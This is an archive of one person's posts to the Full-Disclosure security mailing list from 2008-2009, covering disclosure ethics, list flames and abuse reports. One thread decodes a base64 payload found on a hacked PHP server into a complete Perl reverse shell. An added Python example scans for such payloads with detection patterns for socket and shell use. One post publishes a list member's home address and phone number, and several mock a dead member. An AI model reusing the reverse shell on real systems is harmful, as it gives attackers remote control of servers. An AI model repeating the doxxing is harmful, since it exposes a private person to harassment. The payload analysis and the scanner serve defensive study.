Re: [Full-disclosure] connect back PHP hack

2009-02-10 Thread Simon Smith
Can you send me the entire package, I'm interested in whatever it is  
that was uploaded to your box.



On Feb 10, 2009, at 1:23 PM, sr. wrote:

 can anyone tell me what encoding this is?

 $back_connect =
 IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==;

 this has to do with old php 4.x.x version with magic quotes enabled.
 i'm just trying to figure out what the connect back code does.

 any input is much appreciated.

 thx,

 sr.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com






Re: [Full-disclosure] connect back PHP hack

2009-02-10 Thread Simon Smith
Damn you! I hate being wrong!  I'm going to go stand in my corner and  
pout now.


On Feb 10, 2009, at 1:58 PM, Razi Shaban wrote:

 On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith si...@snosoft.com  
 wrote:
 Technically it doesn't decrypt to anything, it decodes. :)




 According to the Federal Standard 1037C, the National Information
 Systems Security Glossary, and the Department of Defense Dictionary of
 Military and Associated Terms:

 In telecommunications, the term decrypt has the following meanings:

 1. [A] generic term encompassing decode and decipher.

 2. To convert encrypted text into its equivalent plaintext by means of
 a cryptosystem. 

 http://en.wikipedia.org/wiki/Decrypt


 So no, I mean decrypt.


 Regards,
 Razi Shaban


Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com






Re: [Full-disclosure] connect back PHP hack

2009-02-10 Thread Simon Smith
Technically it doesn't decrypt to anything, it decodes. :)


On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote:

 On Tue, Feb 10, 2009 at 8:23 PM, sr. static...@gmail.com wrote:
 can anyone tell me what encoding this is?

 $back_connect =
 IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==;

 this has to do with old php 4.x.x version with magic quotes enabled.
 i'm just trying to figure out what the connect back code does.

 any input is much appreciated.

 thx,

 sr.


 Base64, the == at the end gives it away. It decrypts to:

 #!/usr/bin/perl
 use Socket;
 $cmd= "lynx";
 $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
 $0=$cmd;
 $target=$ARGV[0];
 $port=$ARGV[1];
 $iaddr=inet_aton($target) || die("Error: $!\n");
 $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
 $proto=getprotobyname('tcp');
 socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
 connect(SOCKET, $paddr) || die("Error: $!\n");
 open(STDIN, ">&SOCKET");
 open(STDOUT, ">&SOCKET");
 open(STDERR, ">&SOCKET");
 system($system);
 close(STDIN);
 close(STDOUT);
 close(STDERR);

 --

 Regards,
 Razi Shaban



Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
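
The triage done by hand in the thread above (spot the base64 literal, decode it, read what the result does), as an added Python example that is not part of the original posts. The indicator patterns, function names and sample PHP are constructed for illustration; the example also covers a case the `==` hint misses, since base64 of input whose length is a multiple of three carries no padding at all.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Quoted literals of 40+ base64-alphabet characters. Whitespace is allowed
# because long strings are often wrapped across lines, as in the quoted mail.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/\s]{40,}={0,2})["']""")

# Indicator patterns modelled on the decoded Perl in this thread (names are
# assumptions made for this example, not an established rule set).
INDICATORS = {
    "socket_api": re.compile(r"\buse\s+Socket\b|\bsocket\s*\("),
    "outbound_connect": re.compile(r"\bconnect\s*\("),
    "stdio_redirect": re.compile(r'open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*"?>?&?\s*SOCKET'),
    "shell_exec": re.compile(r"/bin/(?:ba)?sh\b"),
    "process_rename": re.compile(r"\$0\s*="),
}
# A connect-back needs all three: dial out, rewire stdio to the socket, run a shell.
CONNECT_BACK = {"outbound_connect", "stdio_redirect", "shell_exec"}


@dataclass
class Finding:
    offset: int        # position of the literal in the scanned source
    padded: bool       # True when the literal ends in '='
    decoded: str       # decoded text
    hits: frozenset    # names of the indicators that matched

    @property
    def connect_back(self) -> bool:
        return CONNECT_BACK <= self.hits


def try_decode(candidate: str, min_printable: float = 0.9):
    """Return decoded text if candidate is strict base64 of mostly printable bytes."""
    compact = "".join(candidate.split())          # undo line wrapping
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None                               # wrong length or alphabet
    if not raw:
        return None
    printable = sum(1 for b in raw if 32 <= b < 127 or b in (9, 10, 13))
    if printable / len(raw) < min_printable:
        return None                               # decodes, but to binary noise
    return raw.decode("latin-1")


def scan_php(source: str):
    """Decode every base64-looking literal and record which indicators it hits."""
    findings = []
    for m in B64_LITERAL.finditer(source):
        text = try_decode(m.group(1))
        if text is None:
            continue
        hits = frozenset(n for n, rx in INDICATORS.items() if rx.search(text))
        findings.append(Finding(m.start(1), m.group(1).rstrip().endswith("="), text, hits))
    return findings


def _b64(data: bytes, width: int = 0) -> str:
    s = base64.b64encode(data).decode("ascii")
    if not width:
        return s
    return "\n ".join(s[i:i + width] for i in range(0, len(s), width))


# Constructed sample input: indicator lines only, not a working script.
_fragment = (b'use Socket;\nconnect(SOCKET, $paddr);\n'
             b'open(STDIN, ">&SOCKET");\nsystem("/bin/sh");\n')
_fragment += b"\n" * (-len(_fragment) % 3)        # length % 3 == 0: no '=' padding
_benign = b"site_title=Example Intranet; theme=default; lang=en"
_benign += b"." * ((1 - len(_benign)) % 3)        # length % 3 == 1: '==' padding

SAMPLE_PHP = (
    "<?php\n"
    f'$back_connect = "{_b64(_fragment, 60)}";\n'
    f"$settings = '{_b64(_benign)}';\n"
    "$tpl = '/var/www/html/includes/templates/default/header';\n"
)

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        verdict = "CONNECT-BACK" if f.connect_back else "no shell indicators"
        print(f"offset {f.offset}: padded={f.padded} {verdict} {sorted(f.hits)}")
```

The unpadded literal is the one flagged, while the padded one is benign, so padding is a hint about the encoding and says nothing about the content.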


Re: [Full-disclosure] The war in Palestine

2009-01-05 Thread Simon Smith
Allaa,
Frankly I think that the entire thing is silly. We're human beings  
made up of the same flesh, blood and bone. We all come from the exact  
same source regardless of what name we give it.  The same bullet that  
can kill me can kill you and the resulting family pains would also be  
similar.  It's a war not worth fighting for either side, just be  
present and enjoy the life that you can have instead of making it  
miserable by focusing on the past which can not be changed and the  
future which will never exist.  The future is just a projection from  
your imagination but the present is where you're living.  If you're  
unhappy with where you are in the present then you haven't been living  
in the present properly.

God I sound like a monk or something...


On Jan 4, 2009, at 6:10 AM, Alaa Abdelwahab wrote:

 Dear All

 While I believe this is not the best place to discuss this subject,  
 and it will be my first post ever, but you really gave me a very  
 good reason to send this mail.

 I do recommend every one to read the history to know why rockets are  
 launched from Gaza toward the “Israeli” lands, and what the Israeli  
 troops are really doing.

 You do not have time ? yes even sometime I don’t have enough time to  
 read my own mails.

 I will try to help, have a look on this map

 image001.jpg

 Do you understand why the small green areas are attacking the white  
 ones ??

 If you don’t like to think about it and maybe we are all technical  
 ppl who really only understand numbers? I will help as well

 In the last 8 years there were 5000 rockets (if we can really call  
 it rockets) launched from the green areas killed “5” and wounded  
 “15”  and captured “1” ppl who lives in the white lands.

 So the ppl from the white areas answer by killing “5000” and wounded  
 “15” and capture more than “2” ppl from the green areas (7%  
 of these number are only in the last 7 days).

 Maybe I will try to help more after 10 years from now by sending  
 another Map, and lets discuss then why the Palestinians didn’t  
 resist to exist, if we will remember if there was a country called  
 Palestine, which used to own the whole green and white lands only 70  
 years ago

 I hope that I didn’t take much time from you all.

 Brgds…Alaa



Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com






[Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess

2008-12-30 Thread Simon Smith

http://snosoft.blogspot.com/2008/12/brian-chess-cto-of-fortify-software.html


Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com






Re: [Full-disclosure] Cyber attacks in alphabetical order? Estonia, Georgia analysis

2008-09-28 Thread Simon Smith
omigawd gadi!

n3td3v wrote:
 I've noticed these cyber attacks are in alphabetical order, E, G.
 Also, if you turn E, G around you get the initials of Gadi Evron. ;)
 
 All the best,
 
 n3td3v
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] To disclose or not to disclose

2008-09-27 Thread Simon Smith
Great replies guys!

So let's take this a step further. Let's suppose (again just theory) that
the security company did notify the software vendor and did tell the
vendor where the security issues were in their technology, how to
exploit the issues, provided a proof of concept, and provided clear and
actionable methods for remediation. Let's then say that the software
vendor flat out, point blank, rejected that information and refused to
implement any fixes.

Just to make this more interesting, let's say that this all happened
over one year ago. Let's also say that the customer who was being tested
by the security company and that is using the vulnerable software has
yet to address the vulnerability in their own network too.

Is it the ethical duty of the security company to release an advisory?
Does that advisory put the customer at risk? It is clearly unethical to
do nothing and to leave everyone else at risk. How to proceed?

AaRoNg11 wrote:
 
 
 On Sat, Sep 27, 2008 at 9:13 AM, AaRoNg11 [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 
 Hey, this is a situation that occurs quite frequently within the
 security industry. (Bad) Vendors often refuse to fix bugs or ignore
 them completely until it's too late.
 
 You should ideally assess each situation on a case by case basis.
 Ideally, the first step should be to notify the vendor giving them
 as much technical information about the bug as possible. You should
 also document the severity of the bug, and give the vendor some
 examples of what a malicious user would be able to do.
 
 If the vendor has not responded within 5 weeks, the second step
 should be to create an extremely generic public advisory. This
 advisory should explain what the bug allows a malicious user to do,
 while not detailing the technical aspects. By doing this, you are
 letting the industry know that the software is vulnerable, and it
 would be a good idea to start looking at possible alternatives. It
 is at this point that you should set a deadline for your public
 disclosure of the full advisory. This will put pressure on the
 vendor to get a patch out ASAP.
 
 A few days before the deadline, you should try to release a fix for
 the affected product yourself. Obviously this is only possible with
 open source software. Most people that use mission critical software
 (such as hospitals etc) will be signed up to at least one security
 mailing list. By doing this, you give them a chance to patch the bug
 before the script kiddies get in. While it may be possible to
 recreate the exploit from the patched code, it is unlikely that
 anybody will be able to rush anything out in the few days before the
 public advisory.
 
 
 On Sat, Sep 27, 2008 at 4:39 AM, Simon Smith [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 
 Greetings,
 I have a theoretical question of ethics for other security
 professionals that participate in this list. This is not an actual
 situation, but it is a potentially realistic situation that I'm
 interested in exploring and finding an acceptable solution to.
 
 Suppose a penetration testing company delivers a service to a
 customer. That customer uses a technology that was created by a third
 party to host a critical component of their infrastructure. The
 penetration testing company identifies several critical flaws in the
 technology and notifies the customer, and the vendor.
 
 One year passes and the vendor had done nothing to fix the issue. The
 customer is still vulnerable and they have done nothing to change their
 level of risk and exposure. In fact, let's say that the vendor flat out
 refuses to do anything about the issue even though they have been
 notified of the problem. Let's also assume that this issue affects
 thousands of customers in the financial and medical industry and puts
 them at dire risk.
 
 What should the security company do?
 
 1-) Create a formal advisory, contact the vendor and notify them of the
 intent to release the advisory in a period of n days? If the vendor
 refuses to fix the issue does the security company still release the
 advisory in n days? Is that protecting the customer or putting the
 customer at risk? Or does it even change the risk level as their risk
 still exists.
 
 2-) Does the security company collect a list of users of the technology
 and notify those users one by one? The process might be very time
 consuming but by doing that the security company might not increase the
 risk faced by the users of the technology

Re: [Full-disclosure] To disclose or not to disclose

2008-09-27 Thread Simon Smith
Elazar,
I suppose that could be a good action, but doing that would potentially
put the security company's customer at risk. Granted, in the argument
they were already notified of the risk. So the question is, is that the
ethical choice? Is that a good business choice?


Elazar Broad wrote:
 I would opt for #1, additionally, contacting CERT and other quasi-
 government security organizations would be a plus, they might have
 better luck lighting a fire under the theoretical vendor's ass...
 
 elazar
 
 On Sat, 27 Sep 2008 03:39:34 + Simon Smith [EMAIL PROTECTED]
 wrote:
 Greetings,
 I have a theoretical question of ethics for other security
 professionals that participate in this list. This is not an actual
 situation, but it is a potentially realistic situation that I'm
 interested in exploring and finding an acceptable solution to.
 
 Suppose a penetration testing company delivers a service to a
 customer. That customer uses a technology that was created by a third
 party to host a critical component of their infrastructure. The
 penetration testing company identifies several critical flaws in the
 technology and notifies the customer, and the vendor.
 
 One year passes and the vendor had done nothing to fix the issue. The
 customer is still vulnerable and they have done nothing to change their
 level of risk and exposure. In fact, let's say that the vendor flat out
 refuses to do anything about the issue even though they have been
 notified of the problem. Let's also assume that this issue affects
 thousands of customers in the financial and medical industry and puts
 them at dire risk.
 
 What should the security company do?
 
 1-) Create a formal advisory, contact the vendor and notify them of the
 intent to release the advisory in a period of n days? If the vendor
 refuses to fix the issue does the security company still release the
 advisory in n days? Is that protecting the customer or putting the
 customer at risk? Or does it even change the risk level as their risk
 still exists.
 
 2-) Does the security company collect a list of users of the technology
 and notify those users one by one? The process might be very time
 consuming but by doing that the security company might not increase the
 risk faced by the users of the technology, will they?
 
 3-) Does the security company release a low level advisory that notifies
 users of the technology to contact the vendor in order to gain access to
 the technical details about the issue?
 
 4-) Does the security company do something else? If so, what is the
 appropriate course of action?
 
 5-) Does the security company do nothing?
 
 I'm very interested to hear what people think the responsible action
 would be here. It appears that this is a challenge that will at some
 level create risk for the customer. Is it impossible to do this without
 creating an unacceptable level of risk?
 
 Looking forward to real responses (and troll responses too... especially
 n3td3v).
 
 --
 
 - simon
 
 --
 http://www.snosoft.com
 



-- 

- simon

--
http://www.snosoft.com



[Full-disclosure] To disclose or not to disclose

2008-09-26 Thread Simon Smith
Greetings,
I have a theoretical question of ethics for other security
professionals that participate in this list. This is not an actual
situation, but it is a potentially realistic situation that I'm
interested in exploring and finding an acceptable solution to.

Suppose a penetration testing company delivers a service to a
customer. That customer uses a technology that was created by a third
party to host a critical component of their infrastructure. The
penetration testing company identifies several critical flaws in the
technology and notifies the customer, and the vendor.

One year passes and the vendor had done nothing to fix the issue. The
customer is still vulnerable and they have done nothing to change their
level of risk and exposure. In fact, let's say that the vendor flat out
refuses to do anything about the issue even though they have been
notified of the problem. Let's also assume that this issue affects
thousands of customers in the financial and medical industry and puts
them at dire risk.

What should the security company do?

1-) Create a formal advisory, contact the vendor and notify them of the
intent to release the advisory in a period of n days? If the vendor
refuses to fix the issue does the security company still release the
advisory in n days? Is that protecting the customer or putting the
customer at risk? Or does it even change the risk level as their risk
still exists.

2-) Does the security company collect a list of users of the technology
and notify those users one by one? The process might be very time
consuming but by doing that the security company might not increase the
risk faced by the users of the technology, will they?

3-) Does the security company release a low level advisory that notifies
users of the technology to contact the vendor in order to gain access to
the technical details about the issue?

4-) Does the security company do something else? If so, what is the
appropriate course of action?

5-) Does the security company do nothing?

I'm very interested to hear what people think the responsible action
would be here. It appears that this is a challenge that will at some
level create risk for the customer. Is it impossible to do this without
creating an unacceptable level of risk?

Looking forward to real responses (and troll responses too... especially
n3td3v).

-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] DIE IN A FIRE post

2008-08-27 Thread Simon Smith
Hi Mike,
Next time you decide to say something stupid make sure that you do it
anonymously.

Michael C Shirk

Home:
4205 Chapel Gate Pl
Belcamp, MD 21017-1636
(410) 273-1377

M. Shirk wrote:
 DIE IN A FIRE !!!1!1!
 
 Shirkdog
 ' or 1=1--
 http://www.shirkdog.us
 
 
 Date: Tue, 26 Aug 2008 18:59:06 -0700
 From: [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] test post
 
 test
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] DIE IN A FIRE post

2008-08-27 Thread Simon Smith
You must be a bureaucrat.

Randal T. Rioux wrote:
 On Wed, August 27, 2008 11:34 am, Simon Smith wrote:
 Hi Mike,
  Next time you decide to say something stupid make sure that you do it
 anonymously.

 Michael C Shirk

 Home:
 4205 Chapel Gate Pl
 Belcamp, MD 21017-1636
 (410) 273-1377

 M. Shirk wrote:
 DIE IN A FIRE !!!1!1!

 Shirkdog
 ' or 1=1--
 http://www.shirkdog.us
 
 Simon:
 
 A: Because it messes up the order in which people normally read text.
 Q: Why is top-posting such a bad thing?
 A: Top-posting.
 Q: What is the most annoying thing in e-mail?
 
 Shirkdog:
 
 Seems we share a state. Ask the evil hacker Simon for my address - come on
 over. I'll back a cake.
 
 Randy
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] wow.

2008-05-28 Thread Simon Smith
And people wonder why they get pwned all the time...

Charles Morris wrote:
 http://www.sowela.edu/elearning.html
 
 ...  comments?
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] wow.

2008-05-28 Thread Simon Smith
Marcin my man, go back and re-read the email... specifically his 
signature. If you don't get it... well then abandon all hope.

;]

Marcin Wielgoszewski wrote:
 Logon to non-ssl site, password is same as username, username
 convention is described right on the site...
 
 On Wed, May 28, 2008 at 4:45 PM, Arshan Dabirsiaghi
 [EMAIL PROTECTED] wrote:
 What's the issue here? I don't see any problem.

 Sincerely,
 swadabirsiaghi64

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Charles
 Morris
 Sent: Wednesday, May 28, 2008 4:38 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] wow.

 http://www.sowela.edu/elearning.html

 ...  comments?

 --

 Charles Morris
  [EMAIL PROTECTED],
  [EMAIL PROTECTED]

 Network Security Administrator,
 Software Developer

 Office of Computing and Communications Services,
 CS Systems Group Old Dominion University
 http://www.cs.odu.edu/~cmorris


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Ford Motors IT Contact

2008-05-27 Thread Simon Smith
In response to them still being infected with sql slammer and it probing 
my networks regularly.

Nate McFeters wrote:
 Is this in response to a vulnerability to report, or in response to some 
 other form of abuse, like spam?
  
 -Nate
 
  
 On 5/27/08, *Gary Wilson* [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:
 
 
 On Tue, May 27, 2008 16:46, Simon Smith wrote:
   Does anyone here have a contact for Ford Motors IT Department,
   Specifically for abuse?
   --
  
 
 Europe, or US?  And in relation to their online activities or other?
 
 When I was on my placement year, I did all of Ford Europe's website and I
 was employed by the Marketing company Wunderman Cato Johnson - so I guess
 contacting them if it's Europe and to do with their online presence.
 
 Things may have changed, but a quick google suggests Wunderman are still
 heavily involved with Ford, Europe.
 
 HTH
 
 GW
 
 
 
 --
   /   Gary Wilson, aka dragon/dragonlord/dragonv480\
 .'(_.--.  e: [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] MSN: dragonv480   .--._)`.
_   |  Skype:dragonv480 ICQ:342070475 AIM:dragonv480  
 |   _   
 `.( `--' w: http://volvo480.northernscum.org.uk  
 `--' ).'
   \w: http://www.northernscum.org.uk   /
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Ford Motors IT Contact

2008-05-27 Thread Simon Smith
Indeed, that is the IP address.

That IP address appears to be bound to some sort of a VPN system for 
ford. Perhaps it's infected VPN users?

Michael Holstein wrote:
 
 In response to them still being infected with sql slammer and it 
 probing my networks regularly.
   
 Let me guess .. it's 136.1.7.55 ?
 
 Here's what I get (from ford) every time that IP pops up in our 
 automated abuse report ..
 
 --snip--
 
 Our investigation into this matter has determined that the recent onset
 of attacks from this IP is the result of the IP being forged by an
 external party.  External parties will commonly use IP addresses that
 belong to large organizations to mask network traffic.
 
 --snip--
 
 Cheers,
 
 Michael Holstein
 Cleveland State University
 
 

-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Snort Signature to detect credit cards

2008-05-08 Thread Simon Smith
You sure you got that URL right?

Ray P wrote:
 The free rule sets from http://www.emergingthreats.com have this 
 capability. Look in the Policy section.
 
 RAy
 
 
 From: [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Date: Thu, 8 May 2008 12:44:15 -0600
 Subject: [Full-disclosure] Snort Signature to detect credit cards
 
  
 Does anyone have a snort signature to detect credit cards or social
 security numbers?
  
 Thank you in advance,
  
 Jeff
 
 
 


-- 

- simon

--
http://www.snosoft.com



[Full-disclosure] We've shut down the Exploit Acquisition Program

2008-03-16 Thread Simon Smith
If you're interested you can read about it here:

http://snosoft.blogspot.com/2008/03/exploit-acquisition-program-shut-down.html



-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Anyone else seeing this?

2008-02-19 Thread Simon Smith
That's because you've been writing less you moron.

Joey Mengele wrote:
 SPAM levels greatly decreased on my servers since Dude Van Doornail 
 kicked the bucket. Can anyone else confirm this on their equipment?
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread Simon Smith
Again,
It wasn't an assumption, it was a suggestion.

J. Oquendo wrote:
 Simon Smith wrote:
 Ok,

 Big deal I typed it wrong once. More significantly, your interpretation
 of what I wrote is inaccurate. Why are you supporting the trolls?
 
 Did you see any support of any trolls? I stay out of trolling. Besides 
 death is death, it's a sad loss but life moves on. People come, people 
 go, had I known him I'd make a comment to no one on a public forum since 
 it wouldn't be the right medium. Maybe flowers or a condolence card to 
 his family would have been my route. I have little time for trolling 
 especially to spit on someone who's not around to defend himself. I've 
 no opinion of JP other than he seemed to be a knowledgeable person 
 unlike many a poster here. I don't play the suck up game either he will 
 be greatly missed. I'm sure his family and friends will miss him and I 
 hope they cherish his memory lest they become robots, as for me, I 
 didn't know him to make a comment. My comment was towards you and your 
 incorrect ASSumption of law.
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread Simon Smith
Ok,

Big deal I typed it wrong once. More significantly, your interpretation
of what I wrote is inaccurate. Why are you supporting the trolls?

RB wrote:
 At least spell 'Libel' correctly for anyone to take you seriously.
 You should know vain threats won't help the matter, and will frankly
 only encourage the trolls to continue.  Yes, they are egregiously
 immature and offend you in the wake of DvW's death, but that doesn't
 make them any different than the trolls they were two weeks ago.
 
 Let it go, man - it's a fight you can't win unless you have deeper
 pockets and more political power than all of corporate Amerika
 combined.




-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Brute force attack - need your advice

2008-02-12 Thread Simon Smith
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Show me proof that you're not talking out of your ass.

Andrew A wrote:
| How: fistfull of barbituates
| Why: he was a fucking failure
|
| On Feb 12, 2008 9:15 AM, Simon Smith [EMAIL PROTECTED]
| mailto:[EMAIL PROTECTED] wrote:
|
| Anyone find any info on how or why Dude passed on?
|
|
| [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
|   On Tue, 12 Feb 2008 03:21:20 EST, Keith Kilroy said:
|  
|   The only box that is safe is the one unplugged hdd removed and
|   destroyed and rest of system locked in a closet.
|  
|   Actually, no. :) Some clever guys at UIUC managed to get a
| quantum CPU
|   that wasn't powered on to do some calculations *anyhow*:
|  
|   http://www.newscientist.com/channel/info-tech/mg18925405.700.html
|  
|   Now, if the program run while it's turned off has an exploitable
| bug in it.
|  
|  
|  
|
|
|
| --
|
| - simon
|
| --
| http://www.snosoft.com
|
|
|


- --

- - simon

- --
http://www.snosoft.com



[Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?

2008-02-12 Thread Simon Smith

FYI,

Lible:

An untruthful statement about a person, published in writing or through
broadcast media, that injures the person's reputation or standing in the
community. Because libel is a tort  (a civil wrong), the injured person
can bring a lawsuit against the person who made the false statement.
Libel is a form of defamation , as is slander  (an untruthful statement
that is spoken, but not published in writing or broadcast through the
media).

I'll bet that JP's family can file a lawsuit against the socially
dysfunctional idiots that are tarnishing JP's name. Especially since JP
is deceased. As a result they should be able to subpoena the ISP's and
providers and track these emails back to the places of employment from
which they are being sent. (Or their parents houses.)

I think that JP's family should very seriously consider this option. I
know of a few very good law firms that will work on a percentage with a
small deposit.

- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Brute force attack - need your advice

2008-02-12 Thread Simon Smith
Anyone find any info on how or why Dude passed on?


[EMAIL PROTECTED] wrote:
 On Tue, 12 Feb 2008 03:21:20 EST, Keith Kilroy said:
 
 The only box that is safe is the one unplugged hdd removed and
 destroyed and rest of system locked in a closet.
 
 Actually, no. :) Some clever guys at UIUC managed to get a quantum CPU
 that wasn't powered on to do some calculations *anyhow*:
 
 http://www.newscientist.com/channel/info-tech/mg18925405.700.html
 
 Now, if the program run while it's turned off has an exploitable bug in 
 it.
 
 
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] [funsec] in Memory of Dude VanWinkle / Justin Plazzo

2008-02-12 Thread Simon Smith
What does it take in terms of resources to run a list like Full
Disclosure? Does anyone have a head count or a list of resources?


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Dude VanWinkle's Death

2008-02-11 Thread Simon Smith
Joey, here's a pic of you that I took on that special day!

http://www.movv.com/prvupload/uploads/super_retard_stfu.jpg

Paul Schmehl wrote:
 --On Monday, February 11, 2008 13:10:09 -0500 Joey Mengele 
 [EMAIL PROTECTED] wrote:
 
 LOLOLOL. PICS PICS!

 
 I wouldn't have thought that his death would be a laughing matter.  
 Considering 
 he was only 31, it's rather tragic.  (And no, the original post was not a 
 joke, 
 and yes, he really did die.)
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Dude VanWinkle's Death

2008-02-11 Thread Simon Smith
Joey,
For a retard your quasi email forging skills are impressive. You're 
l33t even!

Joey Mengele wrote:
 LOLOLOLOL.
 
 J
 
 On Mon, 11 Feb 2008 13:18:21 -0500 Simon Smith [EMAIL PROTECTED] 
 wrote:
 Hey Joey, he was a prick but christ man, lay off, he is dead!


 Joey Mengele wrote:
 LOLOLOL. PICS PICS!

 J

 On Mon, 11 Feb 2008 10:40:33 -0500 Jonathan Glass 
 [EMAIL PROTECTED] wrote:
 http://www.timesreporter.com/index.php?ID=79446r=6Category=7

 Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in 
 his 
 home on
 Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976.

 At the time of his death, Justin was employed at the Georgia 
 Institute of
 Technology's Office of Information Technology in the Division 
 of
 Architecture and Infrastructure.

 Justin is survived by his parents, mother Carol Anson Stanwyck 
 (Doug), and
 father Free Polazzo (Janet), brother Chad Polazzo (Lori), and 
 stepsister Liz
 Stanwyck. Other area surviving relatives are Betty Anson, Wendy 
 (Wagner)
 Muzechuk, Ashley and Maggie Haverfield and James Anson 
 (Marilyn) 
 from
 Illinois.

 A memorial service will be held Sunday, Feb. 10, 2008, in 
 Atlanta.
 It's been a sad week for the friends of Dude VanWinkle.

 --JG

 -- 

 - simon

 --
 
 http://www.snosoft.com
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] ASUS Eee PC rooted out of the box

2008-02-09 Thread Simon Smith
cause we love you reepex!


reepex wrote:
